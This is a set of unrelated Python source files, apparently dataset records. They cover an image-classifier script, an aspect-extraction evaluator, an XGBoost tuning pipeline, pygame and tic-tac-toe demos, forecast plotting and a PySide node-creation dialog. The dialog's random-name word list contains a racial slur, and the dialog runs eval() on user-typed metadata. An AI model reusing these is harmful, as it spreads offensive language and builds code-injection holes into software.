extensions)\n","sub_path":"real_life/warning_lights/tools/datasets/find_similar_images.py","file_name":"find_similar_images.py","file_ext":"py","file_size_in_byte":4978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"516820960","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport numpy as np\nfrom os import listdir\nfrom PIL import Image\nimport tensorflow as tf\nfrom tensorflow.keras.models import load_model\n\ndef load_sign_model():\n gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.5)\n sess = tf.Session(config=tf.ConfigProto(gpu_options=gpu_options)) \n tf.reset_default_graph()\n model = load_model('donkey_sign_epoch30_label8.h5')\n return model\n\ndef img_in_model(model):\n image_size_width = 50\n image_size_height = 50\n num_labels = 5\n num_channels = 3 \n epochs = 20\n\n a_counter = 0\n b_counter = 0\n c_counter = 0\n 
s_counter = 0\n flag = 0\n\n test_data = 'mask_img'\n for test_img in listdir(test_data):\n print('{}/{}'.format(test_data, test_img))\n load_img = Image.open('{}/{}'.format(test_data, test_img))\n # load_img_gray = load_img.convert(\"L\")\n load_img01 = load_img.resize((image_size_height,image_size_width))\n load_img02 = np.asarray(load_img01, dtype=np.float32)\n my_img = np.reshape(load_img02, [-1,image_size_height,image_size_width,num_channels]) / 255\n pre_label = model.predict(my_img)\n pre_label = np.argmax(pre_label,1)\n print(pre_label)\n return pre_label\n\nif __name__ == '__main__': \n model = load_sign_model()\n img_path = input('img_path : ')\n img_in_model(model)\n # print(pre_label)\n # fig=plt.figure()\n # for test_img in listdir(test_data):\n \n # if flag == 12:\n # break\n # all_data = all_data + 1\n # load_img = Image.open(f'{test_data}{test_img}')\n # load_img_gray = load_img.convert(\"L\")\n # load_img01 = load_img.resize((image_size_height,image_size_width))\n # load_img02 = np.asarray(load_img01, dtype=np.float32)\n # my_img = np.reshape(load_img02, [-1,image_size_height,image_size_width,num_channels]) / 255\n \n # pre_label = model.predict(my_img)\n # pre_label = np.argmax(pre_label,1)\n # print(pre_label)\n \n # y = fig.add_subplot(3,4,flag+1)\n # if pre_label == 0:\n # a_counter = a_counter + 1\n # str_label='A'\n # print(f'這是A')\n # elif pre_label == 1:\n # b_counter = b_counter + 1\n # str_label='B'\n # print(f'這是B')\n # elif pre_label == 2:\n # c_counter = c_counter + 1\n # str_label='C'\n # print(f'這是C')\n # elif pre_label == 3:\n # s_counter = s_counter + 1\n # str_label='STOP'\n # print(f'這是STOP')\n\n \n # y.imshow(load_img)\n # plt.title(str_label)\n # y.axes.get_xaxis().set_visible(False)\n # y.axes.get_yaxis().set_visible(False) \n # flag += 1\n \n # plt.show()\n \n # print('a: {}\\nb: {}\\nc: {}\\ns: {}\\nall: {}'.format(a_counter,b_counter,c_counter,s_counter,all_data))\n\n # xxx = (a_counter/all_data)*100\n # print('{:.2f}%'.format(xxx))\n\n\n","sub_path":"final_donkey_sign_model.py","file_name":"final_donkey_sign_model.py","file_ext":"py","file_size_in_byte":3038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"199684961","text":"import argparse\nimport torch\nimport json\nimport numpy as np\nimport random\nimport xml.etree.ElementTree as ET\nfrom subprocess import check_output\n\nfrom model import Model\n\nimport sys\nfrom os import path\n\nsys.path.append('..')\n\nimport common.util\n\nnp.random.seed(1337)\nrandom.seed(1337)\ntorch.manual_seed(1337)\n# torch.cuda.manual_seed(1337)\n\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\nDATA_DIR = \"../data\"\nPREPARED_DIR = \"prepared_xu\"\nMODEL_DIR = \"models\"\nFN_WORD_IDX = \"word_idx_{language}.json\"\nFN_DATASET = \"dataset_{language}.npz\"\n\n\ndef label_rest_xml(fn, output_fn, corpus, label):\n print(output_fn)\n dom = ET.parse(fn)\n root = dom.getroot()\n zx = -1\n for sent in root.iter(\"sentence\"):\n if \"OutOfScope\" in sent.attrib:\n continue\n zx += 1\n tokens = corpus[zx]\n lb = label[zx]\n opins = ET.Element(\"Opinions\")\n token_idx, pt, tag_on = 0, 0, False\n start, end = -1, -1\n for ix, c in enumerate(sent.find('text').text):\n if token_idx < len(tokens) and pt >= len(tokens[token_idx]):\n pt = 0\n token_idx += 1\n\n if token_idx < len(tokens) and lb[token_idx] == 1 and pt == 0 and c != ' ':\n if tag_on:\n end = ix\n tag_on = False\n opin = ET.Element(\"Opinion\")\n opin.attrib['target'] = 
sent.find('text').text[start:end]\n opin.attrib['from'] = str(start)\n opin.attrib['to'] = str(end)\n opins.append(opin)\n start = ix\n tag_on = True\n elif token_idx < len(tokens) and lb[token_idx] == 2 and pt == 0 and c != ' ' and not tag_on:\n start = ix\n tag_on = True\n elif token_idx < len(tokens) and (lb[token_idx] == 0 or lb[token_idx] == 1) and tag_on and pt == 0:\n end = ix\n tag_on = False\n opin = ET.Element(\"Opinion\")\n opin.attrib['target'] = sent.find('text').text[start:end]\n opin.attrib['from'] = str(start)\n opin.attrib['to'] = str(end)\n opins.append(opin)\n elif token_idx >= len(tokens) and tag_on:\n end = ix\n tag_on = False\n opin = ET.Element(\"Opinion\")\n opin.attrib['target'] = sent.find('text').text[start:end]\n opin.attrib['from'] = str(start)\n opin.attrib['to'] = str(end)\n opins.append(opin)\n if c == ' ':\n pass\n elif tokens[token_idx][pt:pt+2] == '``' or tokens[token_idx][pt:pt+2] == \"''\":\n pt += 2\n else:\n pt += 1\n if tag_on:\n tag_on = False\n end = len(sent.find('text').text)\n opin = ET.Element(\"Opinion\")\n opin.attrib['target'] = sent.find('text').text[start:end]\n opin.attrib['from'] = str(start)\n opin.attrib['to'] = str(end)\n opins.append(opin)\n sent.append(opins)\n dom.write(output_fn)\n\n\ndef seqeval_evaluate(test_y, pred_y):\n\n cleaned_pred_y = []\n\n for idx, test_line in enumerate(test_y):\n pred_line = pred_y[idx]\n cleaned_pred_y.append(pred_line[:np.sum(test_line != -1)])\n\n return common.util.evaluate(test_y, cleaned_pred_y, return_tuple=True)\n\n\ndef test(model, test_X, raw_X, command, template, test_y, batch_size=128):\n pred_y = np.zeros((test_X.shape[0], 83), np.int16)\n model.eval()\n for offset in range(0, test_X.shape[0], batch_size):\n batch_test_X_len = np.sum(test_X[offset:offset+batch_size] != 0, axis=1)\n batch_idx = batch_test_X_len.argsort()[::-1]\n batch_test_X_len = batch_test_X_len[batch_idx]\n # print(batch_test_X_len[0])\n batch_test_X_mask = (test_X[offset:offset+batch_size] != 0)[batch_idx].astype(np.uint8)\n batch_test_X = test_X[offset:offset+batch_size][batch_idx]\n # print(batch_test_X)\n batch_test_X_mask = torch.autograd.Variable(torch.from_numpy(batch_test_X_mask).long().to(device))\n batch_test_X = torch.autograd.Variable(torch.from_numpy(batch_test_X).long().to(device))\n batch_pred_y = model(batch_test_X, batch_test_X_len, batch_test_X_mask, testing=True)\n r_idx = batch_idx.argsort()\n batch_pred_y = batch_pred_y.data.to(\"cpu\").numpy().argmax(axis=2)[r_idx]\n # print(batch_pred_y)\n pred_y[offset:offset+batch_size, :batch_pred_y.shape[1]] = batch_pred_y\n # model.train()\n assert len(pred_y) == len(test_X)\n\n if command:\n command = command.split()\n\n label_rest_xml(template, command[8], raw_X, pred_y)\n acc = check_output(command).split()\n print(acc)\n return float(acc[9][10:])\n else:\n return seqeval_evaluate(test_y, pred_y)\n\n\ndef recreate_data(language, test_X):\n with open(path.join(DATA_DIR, language, PREPARED_DIR, FN_WORD_IDX.format(language=language))) as f:\n mapping = json.load(f)\n rev_mapping = {v: k for k, v in mapping.items()}\n\n return [\n [rev_mapping[t] for t in sent if t != 0] for sent in test_X\n ]\n\n\ndef evaluate(runs, language, model_name, command, template):\n ae_data = np.load(path.join(DATA_DIR, language, PREPARED_DIR, FN_DATASET.format(language=language)))\n raw_X = recreate_data(language, ae_data['test_X'])\n results = []\n for r in range(runs):\n model = torch.load(path.join(DATA_DIR, language, MODEL_DIR, \"xu\" + model_name + \"_\" + str(r)))\n result = 
test(model, ae_data['test_X'], raw_X, command, template, ae_data['test_y'])\n        results.append(result)\n    if command:\n        print(sum(results)/len(results))\n    else:\n        print(\"PREC: {0:.3f}, REC: {1:.3f}, F1: {2:.3f}\".format(\n            round(sum(r[0] for r in results) / len(results), 3),\n            round(sum(r[1] for r in results) / len(results), 3),\n            round(sum(r[2] for r in results) / len(results), 3),\n        ))\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--runs', type=int, default=5)\nparser.add_argument('--language', type=str, default=\"finnish\")\nparser.add_argument('--model_name', type=str, default=\"\")\nparser.add_argument('--official', default=False, action=\"store_true\")\nargs = parser.parse_args()\n\nif args.official:\n    command = \"java --add-modules java.xml.bind -cp script/A.jar absa16.Do Eval -prd data/official_data/pred.xml -gld data/official_data/EN_REST_SB1_TEST.xml.gold -evs 2 -phs A -sbt SB1\"\n    template = \"data/official_data/EN_REST_SB1_TEST.xml.A\"\nelse:\n    command = template = None\n\nevaluate(args.runs, args.language, args.model_name, command, template)\n","sub_path":"script/evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":6764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"565229144","text":"# -*- coding:utf-8 -*-\n#!/usr/bin/python2.7\nfrom __future__ import print_function\n\n#================================================================================\n# You can change the code here below! Edit this configuration section to set the\n# tuning objective and the hyperparameter search ranges.\n#================================================================================\n# 1. Configure the optimization objective\n\ntask_name = 'example'\nscore_func = 'ks' # evaluation metric to optimize; either 'ks' or 'auc'\nscore_gap_limit = 0.03 # maximum acceptable score gap between train and validate\ntrain_data_path = './xx_train_data' # path to the training data\ntest_data_path = './xx_test_data' # path to the test data\noutputdir = './aa_pipeline_result_' + task_name # output directory name\nn_jobs = 16 # number of parallel jobs\n\n#--------------------------------------------------------------------------------\n# 2. Configure initial hyperparameter values\n\n# initialize parameters\nparams_dict = dict()\n\n# parameters to be tuned below\n# booster parameters\nparams_dict['learning_rate'] = 0.1    # learning rate; initial value 0.1, usually the smaller the better.\nparams_dict['n_estimators'] = 50      # number of trees in the additive model; initial value 50.\n\n# tree parameters\nparams_dict['max_depth'] = 3         # tree depth, usually in [3,10]; the initial value is often in [3,6]\nparams_dict['min_child_weight']= 30  # minimum sum of instance weights in a leaf; larger is more conservative.\nparams_dict['gamma']= 0              # minimum loss reduction required to split a node; larger is more conservative.\nparams_dict['subsample']= 0.8        # row (sample) subsampling ratio, usually in [0.5,1] \nparams_dict['colsample_bytree'] = 1.0 # column (feature) subsampling ratio, usually in [0.5,1] \n\n# regularization parameters \n# Omega(f) = gamma*T + reg_alpha* sum(abs(wj)) + reg_lambda* sum(wj**2) \n\nparams_dict['reg_alpha'] = 0    # L1 regularization weight; larger is more conservative, usually in [0,1].\nparams_dict['reg_lambda'] = 1   # L2 regularization weight; larger is more conservative, usually in [1,100].\n\n# the parameters below usually do not need tuning\nparams_dict['objective'] = 'binary:logistic'\nparams_dict['tree_method'] = 'hist'  # tree construction strategy: auto, exact, approx, or hist\nparams_dict['eval_metric'] = 'auc'\nparams_dict['silent'] = 1\nparams_dict['scale_pos_weight'] = 1  # for imbalanced samples, a positive value helps the algorithm converge faster.\nparams_dict['seed'] = 0\n\n#--------------------------------------------------------------------------------\n# 3. Configure hyperparameter search ranges\n\nparams_test1 = {'learning_rate': [0.1],'n_estimators':[50]}  # use a relatively large learning_rate here\n\nparams_test2 = { 'max_depth': [3], 'min_child_weight': [50,100,200] } \n\nparams_test3 = {'gamma': [0.1,0.5,1]}\n\nparams_test4 = { 'subsample': [0.9,1.0],'colsample_bytree': [1.0] } \n\nparams_test5 = { 'reg_alpha': [0.1,1] } \n\nparams_test6 = { 'reg_lambda': [0,0.1] }\n\nparams_test7 = {'learning_rate':[0.09,0.08],'n_estimators':[100]} # use a relatively small learning_rate here\n#===============================================================================\n\n\n\n\n\n\n\n\n#================================================================================\n#Don't change the code below!!!\n#================================================================================\nimport sys,os,json,datetime\nimport numpy as np\nimport pandas as pd\nfrom tianjikit.analysisfeatures import AnalysisFeatures\nfrom tianjikit.trainxgboost import TrainXgboost\nfrom tianjikit.tunning import Tunning\n\n\n# JSON serialization class for numpy floats and ints\nclass numpyJsonEncoder(json.JSONEncoder):\n    def default(self, obj): \n        if isinstance(obj,(np.float,np.float32,np.float64)): \n            return float(obj)\n        elif isinstance(obj, (np.int,np.int0,np.int8,np.int16,np.int32,np.int64)): \n            return int(obj)\n        else: \n            return json.JSONEncoder.default(self, obj)
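\n# Example (illustrative values): json.dumps({'ks': np.float32(0.31)}, cls=numpyJsonEncoder)\n# serializes numpy scalars to plain Python numbers instead of raising TypeError.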
{'learning_rate':[0.09,0.08],'n_estimators':[100]} #此处应配置较小learning_rate\n#===============================================================================\n\n\n\n\n\n\n\n\n#================================================================================\n#Don't change the code below!!! 以下代码请勿轻易改动。\n#================================================================================\nimport sys,os,json,datetime\nimport numpy as np\nimport pandas as pd\nfrom tianjikit.analysisfeatures import AnalysisFeatures\nfrom tianjikit.trainxgboost import TrainXgboost\nfrom tianjikit.tunning import Tunning\n\n\n# 定义对numpy浮点数和整数的json序列化类\nclass numpyJsonEncoder(json.JSONEncoder):\n def default(self, obj): \n if isinstance(obj,(np.float,np.float32,np.float64)): \n return float(obj)\n elif isinstance(obj, (np.int,np.int0,np.int8,np.int16,np.int32,np.int64)): \n return int(obj)\n else: \n return json.JSONEncoder.default(self, obj)\n\ndef main(dftrain,dftest,outputdir = outputdir,n_jobs = n_jobs,\n score_func = score_func, score_gap_limit = score_gap_limit,\n params_dict = params_dict):\n \n if not os.path.exists(outputdir):\n os.makedirs(outputdir)\n \n #================================================================================\n # 一,特征分析\n #================================================================================\n nowtime = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n print('\\n================================================================================ %s\\n'%nowtime)\n print('PART 1:START ANALYSIS FEATURES...')\n \n # 基本分析\n afs = AnalysisFeatures(dftrain,dftest)\n nowtime = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n print('\\n================================================================================ %s\\n'%nowtime)\n dfbasic = afs.basic_analysises()\n\n # ks有效性分析\n nowtime = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n print('\\n================================================================================ %s\\n'%nowtime)\n dfks = afs.ks_analysises()\n \n # 稳定性分析\n nowtime = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n print('\\n================================================================================ %s\\n'%nowtime)\n dfpsi = afs.psi_analysises()\n \n print('save results... 
')\n # 保存相应文件\n dfbasic.to_csv(outputdir + '/basic_analysises.csv',sep = '\\t',encoding = 'utf-8')\n dfks.to_csv(outputdir +'/ks_analysises.csv',sep = '\\t',encoding = 'utf-8')\n dfpsi.to_csv(outputdir + '/psi_analysises.csv',sep = '\\t',encoding = 'utf-8')\n try:\n dfbasic.to_excel(outputdir + '/basic_analysises.xlsx',encoding = 'utf-8')\n dfks.to_excel(outputdir +'/ks_analysises.xlsx',encoding = 'utf-8')\n dfpsi.to_excel(outputdir + '/psi_analysises.xlsx',encoding = 'utf-8')\n except:\n pass\n \n #================================================================================\n # 二,模型调参\n #================================================================================\n nowtime = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n print('\\n================================================================================ %s\\n'%nowtime)\n print('PART 2:START TUNNING XGBOOT...')\n \n # step0: 初始化\n tune = Tunning(dftrain,dftest,score_func = score_func,score_gap_limit = score_gap_limit, \n params_dict=params_dict,n_jobs=n_jobs)\n \n # step1: \n if 'params_test1' in globals():\n nowtime = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n print('\\n================================================================================ %s\\n'%nowtime)\n print('step1: try relatively high learning_rate...')\n dfscore_best = tune.gridsearch_cv(params_test1,cv = 5,verbose_eval = 20)\n \n # step2:\n if 'params_test2' in globals():\n nowtime = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n print('\\n================================================================================ %s\\n'%nowtime)\n print('step2: tune max_depth & min_child_weight...')\n dfscore_best = tune.gridsearch_cv(params_test2,cv = 5,verbose_eval = 20)\n \n \n # step3:\n if 'params_test3' in globals():\n nowtime = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n print('\\n================================================================================ %s\\n'%nowtime)\n print('step3: tune gamma...')\n dfscore_best = tune.gridsearch_cv(params_test3,cv = 5,verbose_eval = 20)\n \n \n # step4:\n if 'params_test4' in globals():\n nowtime = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n print('\\n================================================================================ %s\\n'%nowtime)\n print('step4: tune subsample & colsample_bytree...')\n dfscore_best = tune.gridsearch_cv(params_test4,cv = 5,verbose_eval = 20)\n\n \n # step5: \n if 'params_test5' in globals():\n nowtime = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n print('\\n================================================================================ %s\\n'%nowtime)\n print('step5: tune reg_alpha...')\n dfscore_best = tune.gridsearch_cv(params_test5,cv = 5,verbose_eval = 20)\n \n \n # step6: \n if 'params_test6' in globals():\n nowtime = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n print('\\n================================================================================ %s\\n'%nowtime)\n print('step6: tune reg_lambda...')\n dfscore_best = tune.gridsearch_cv(params_test6,cv = 5,verbose_eval = 20)\n \n \n # step7: \n if 'params_test7' in globals():\n nowtime = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n print('\\n================================================================================ %s\\n'%nowtime)\n print('step7: try relatively low learning_rate...')\n dfscore_best = tune.gridsearch_cv(params_test7,cv = 5,verbose_eval = 20)\n \n # step8: \n nowtime = datetime.datetime.now().strftime('%Y-%m-%d 
%H:%M:%S')\n print('\\n================================================================================ %s\\n'%nowtime)\n print('step8: train model with tuned parameters and fully train dataset...')\n nowtime = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n print('\\n================================================================================ %s\\n'%nowtime)\n bst,dfimportance = tune.train_best()\n \n #generate results\n nowtime = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n print('\\n================================================================================ %s\\n'%nowtime)\n print('save results... ')\n \n with open(outputdir +'/best_parameters.json','w') as f:\n json.dump(tune.params_dict,f,cls = numpyJsonEncoder)\n \n tune.dfmerge.to_csv(outputdir + '/dfresults',sep = '\\t',encoding = 'utf-8')\n try:\n tune.dfmerge.to_excel(outputdir + '/dfresults.xlsx',encoding = 'utf-8')\n except:\n pass\n \n bst.save_model(outputdir + '/bst.model')\n \n dfimportance.to_csv(outputdir + '/dfimportance',sep = '\\t',encoding = 'utf-8')\n try:\n dfimportance.to_excel(outputdir + '/dfimportance.xlsx',encoding = 'utf-8')\n except:\n pass\n \n #================================================================================\n # 三,模型报告\n #================================================================================\n nowtime = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n print('\\n================================================================================ %s\\n'%nowtime)\n print('PART 3:START MODEL REPORT...')\n \n # 训练xgboost模型\n model = TrainXgboost(dftrain = dftrain,dftest = dftest, coverage_th=0, ks_th=0,\n outliers_th=None, selected_features=None)\n bst = model.train(cv=5, model_idx=1,params_dict = tune.params_dict,n_jobs = n_jobs, verbose_eval = 20) \n model.test(bst)\n report_info = model.report_info\n \n \n # 保存相应文件\n print('\\nsave results... 
') \n with open(outputdir + '/model_report','w') as f:\n f.write(report_info) \n \n \n nowtime = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n print('\\n================================================================================ %s\\n'%nowtime)\n print('task end.\\n')\n \n \nif __name__ == '__main__':\n print('\\ntask_name: %s '%task_name)\n dftrain = pd.read_csv(train_data_path,sep = '\\t',encoding = 'utf-8')\n dftest = pd.read_csv(test_data_path,sep = '\\t',encoding = 'utf-8')\n main(dftrain,dftest) \n \n####\n###\n##\n#\n \n\n \n","sub_path":"runpipeline.py","file_name":"runpipeline.py","file_ext":"py","file_size_in_byte":12049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"296789411","text":"import sys\nimport pygame\nfrom pygame.locals import QUIT\n\npygame.init()\n#画面の大きさ\nSURFACE = pygame.display.set_mode((900,900))\nFPSCLOCK = pygame.time.Clock()\n\ndef main():\n logo = pygame.image.load(\"pythonlogo.png\")\n theta = 0\n\n while True:\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n theta += 1\n\n # 画面の色\n SURFACE.fill((255, 255, 255))\n\n #ロゴを開店し、中心が(200,150)の位置にロゴを描画\n new_logo = pygame.transform.rotate(logo,theta)\n rect = new_logo.get_rect()\n rect.center = (400,400)\n SURFACE.blit(new_logo,rect)\n\n pygame.display.update()\n FPSCLOCK.tick(50)\n\nif __name__ == '__main__':\n main()","sub_path":"draw_image4.py","file_name":"draw_image4.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"523888908","text":"class Morpion:\n\n pieces = [\"_ |\",\"X |\",\"O |\"]\n all_states = ['a','b']\n\n @staticmethod\n def show_scoring_in_board(scoring):\n for i in range(3):\n print(str(int(scoring[0][i*3]*100))+' | '+str(int(scoring[0][i*3+1]*100))+' | '+str(int(scoring[0][i*3+2]*100)))\n\n def __init__(self,silent):\n self.state = [0,0,0,0,0,0,0,0,0]\n self.winner = None\n self.draw = None\n self.silent = silent\n\n def set_state(self,i,id):\n self.state[i] = id\n\n def draw_board(self):\n for k in range(0,3):\n print(Morpion.pieces[self.state[k*3]]+\" \"+Morpion.pieces[self.state[k*3+1]]+\" \"+Morpion.pieces[self.state[k*3+2]])\n print(\"\\r\")\n\n def is_same_player(self,i,j,k):\n if (self.state[i] == self.state[j]) and (self.state[i] == self.state[k]):\n return self.state[i]\n else:\n return 0\n\n def is_valid(self,action):\n if isinstance(action,int):\n if action >= 0 and action <= 8:\n if self.state[action] == 0:\n return True\n return False\n\n def check_winner(self):\n self.winner = max([\n self.is_same_player(0,1,2),\n self.is_same_player(3,4,5),\n self.is_same_player(6,7,8),\n self.is_same_player(0,3,6),\n self.is_same_player(1,4,7),\n self.is_same_player(2,5,8),\n self.is_same_player(0,4,8),\n self.is_same_player(2,4,6)\n ])\n if self.winner and not self.silent:\n print(\"Player \"+str(self.winner)+\" (\"+Morpion.pieces[self.winner]+\") wins!\")\n\n def check_draw(self):\n if not self.winner and 0 not in self.state:\n self.draw = True\n if not self.silent:\n print(\"This is a draw!\")\n return True\n else:\n return False\n\n\n def is_done(self):\n return True if self.winner or self.draw else False\n\n\nif __name__=='__main__':\n jeu = Morpion()\n","sub_path":"morpion.py","file_name":"morpion.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"192861257","text":"from numpy import 
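The script/evaluation.py record above rebuilds character-offset Opinion spans from token-level tags with four nearly identical branches. A minimal sketch of the same decoding idea, assuming the tag scheme the snippet implies (0 = outside, 1 = beginning of a term, 2 = inside); decode_spans and its inputs are hypothetical names, not part of that script:

import re  # stdlib only; no project code is assumed

def decode_spans(text, token_spans, labels):
    """token_spans: list of (start, end) character offsets per token."""
    spans, open_start = [], None
    for (start, end), lab in zip(token_spans, labels):
        if lab == 1:                      # a new term begins
            if open_start is not None:    # close any term still open
                spans.append((open_start, prev_end))
            open_start = start
        elif lab == 0 and open_start is not None:
            spans.append((open_start, prev_end))
            open_start = None
        prev_end = end                    # remember where the last token ended
    if open_start is not None:            # term runs to the end of the sentence
        spans.append((open_start, prev_end))
    return [(s, e, text[s:e]) for (s, e) in spans]

# Example: "great fish tacos" tagged O B I yields one span covering "fish tacos".
print(decode_spans("great fish tacos", [(0, 5), (6, 10), (11, 16)], [0, 1, 2]))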
*\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn import ensemble, linear_model\nfrom statsmodels.tsa.seasonal import seasonal_decompose\nimport math, itertools\n\n# Set params\nyear_start = 2019\nweek_start = 10\nplot_metric = 'revenue'\nmetric_suffix = '$'\n\n\n# Read data\nreal_df = pd.read_csv(f'Output/{year_start}_real.csv', header=0)\nproj_df = pd.read_csv(f'Output/{year_start}_projected.csv', header=0)\nall_hierarchies = list(sort(list(set(proj_df['hierarchy'].values))))\n\nreal_df = real_df[real_df['metric']==plot_metric]\nproj_df = proj_df[proj_df['metric']==plot_metric]\n\nnum_columns = min(len(all_hierarchies),2)\nnum_rows = min(math.ceil(len(all_hierarchies)/2),3)\nnum_batchs = math.ceil(len(all_hierarchies)/6)\n\n\nfor batch in range(num_batchs):\n\tlist_hierarchies = all_hierarchies[(batch*6):((batch+1)*6)]\n\tfig = plt.figure(figsize=(15*(num_columns/2),10*(num_rows/3)), dpi=200)\n\tfor k in range(len(list_hierarchies)):\n\t\tplot_hierarchy = list_hierarchies[k]\n\t\tplot_real_df = real_df[real_df['hierarchy'] == plot_hierarchy]\n\t\tplot_proj_df = proj_df[proj_df['hierarchy'] == plot_hierarchy]\n\n\t\tall_stores = list(set(plot_real_df['store_id'].values))\n\t\tproj_stores = list(set(plot_proj_df['store_id'].values))\n\t\tplot_real_df = plot_real_df[plot_real_df['store_id'].isin(proj_stores)]\n\n\t\tplot_real_df = plot_real_df.groupby(['year','week_num']).sum()[['value']]\n\t\tplot_proj_df = plot_proj_df.groupby(['year','week_num']).sum()[['projected_value']]\n\n\t\tplot_real_df.reset_index(inplace=True)\n\t\tplot_proj_df.reset_index(inplace=True)\n\t\tplot_df = pd.merge(plot_real_df, plot_proj_df, how='outer')\n\t\tplot_df.index = [str(x)+'-WK'+('0'*(y<10))+str(y) for (x,y) in zip(plot_df['year'].values,plot_df['week_num'])]\n\n\t\tgroup_vals = real_df.groupby('hierarchy').sum()['value']\n\t\tperc_all = group_vals[plot_hierarchy]/group_vals.sum()\n\n\t\t# Match proj with actual on day of split\n\t\tfor i in range(1,week_start-1):\n\t\t\tind = plot_df[(plot_df['year']==year_start) & (plot_df['week_num']==i)].index.values[0]\n\t\t\tplot_df.at[ind,'projected_value'] = nan\n\n\t\tind = plot_df[(plot_df['year']==year_start) & (plot_df['week_num']==week_start-1)].index.values[0]\n\t\tplot_df.at[ind,'projected_value'] = plot_df.loc[ind, 'value']\n\n\t\tax = fig.add_subplot(num_rows,num_columns,k+1)\n\t\tax.plot(arange(6,len(plot_df)),plot_df.iloc[6:,:]['value'].values,'-',color='#d45087',label=f'Actual {plot_metric}')\n\t\tax.plot(arange(6,len(plot_df)),plot_df.iloc[6:,:]['projected_value'].values,'--',color='#003f5c',label=f'Projected {plot_metric}')\n\t\tax.set_xticks(25*arange(0,len(plot_df)//25+1)-7)\n\t\tax.set_xticklabels([plot_df.index[x] for x in ax.get_xticks()], rotation=30)\n\t\tax.set_yticklabels([metric_suffix+str(int(x/1000))+'K' for x in ax.get_yticks()])\n\n\t\tylim = ax.get_ylim()\n\t\tax.plot([arange(len(plot_df))[plot_df.index==ind][0],arange(len(plot_df))[plot_df.index==ind][0]], ylim,'k--',linewidth=.6)\n\t\tax.axvspan(0,arange(len(plot_df))[plot_df.index==ind][0],color=\"gray\",alpha=.2)\n\t\tax.set_ylim(ylim)\n\t\tax.set_xlim([6,len(plot_df)])\n\t\tax.set_title(plot_hierarchy+f' ({round(100*perc_all,1)}% of Total)')\n\t\tax.legend(loc='upper 
left')\n\n\t\tfig.tight_layout()\n\t\tfig.savefig(f'Output/{year_start}_projected_{plot_metric}_batch{batch}.png')\n\n\n","sub_path":"plot_all_forecasts.py","file_name":"plot_all_forecasts.py","file_ext":"py","file_size_in_byte":3237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"387213070","text":"import itertools\nimport random\n\nfrom PySide2.QtWidgets import QDialog, QPushButton, QLineEdit, QLabel, QGridLayout, QTextEdit, QCheckBox\n\nfirst_names = ['Super', 'Awesome', 'Mega', 'Nasty', 'White', 'Sad', 'Disco', 'Sexy', 'Smelly', 'Hot',\n               'Topless', 'Mad']\nsecond_names = ['Pigeon', 'Worm', 'Nigga', 'Wombat', 'Dn4k', 'Cow', 'Monkey', 'Finger', 'Poop', 'Dog', 'Lama', 'Snake',\n                'Vilain']\n\nnames = list(map(lambda elem: elem[0] + elem[1], itertools.product(first_names, second_names)))\nfor i in range(6666):\n    random.shuffle(names)\n\nnames_iterator = itertools.cycle(names)\n\n\ndef random_name():\n    return next(names_iterator)\n\n\nclass CreateNodeDialog(QDialog):\n    def __init__(self, on_create, parent):\n        super().__init__(parent)\n\n        self.on_create = on_create\n\n        self.setLayout(QGridLayout())\n\n        layout = self.layout()\n\n        layout.addWidget(QLabel('Model'), 0, 0)\n\n        self.model_textbox = QLineEdit('Dummy')\n        layout.addWidget(self.model_textbox, 0, 1)\n\n        layout.addWidget(QLabel('Name'), 1, 0)\n\n        self.name_textbox = QLineEdit(random_name())\n        layout.addWidget(self.name_textbox, 1, 1)\n\n        layout.addWidget(QLabel('ComputeEngine observable'), 2, 0)\n\n        self.observable_checkbox = QCheckBox()\n        layout.addWidget(self.observable_checkbox, 2, 1)\n\n        layout.addWidget(QLabel('Custom Metadata'), 3, 0)\n\n        self.metadata_textbox = QTextEdit('{}')\n        layout.addWidget(self.metadata_textbox, 3, 1)\n\n        self.create_button = QPushButton('Create')\n        layout.addWidget(self.create_button, 4, 1)\n\n        self.create_button.clicked.connect(lambda: self._on_create())\n\n    def _on_create(self):\n        model = self.model_textbox.text()\n        metadata = eval(self.metadata_textbox.toPlainText())\n        metadata['name'] = self.name_textbox.text()\n\n        if self.observable_checkbox.isChecked():\n            metadata['computeengine.observable'] = True\n\n        self.on_create(model, metadata)\n\n        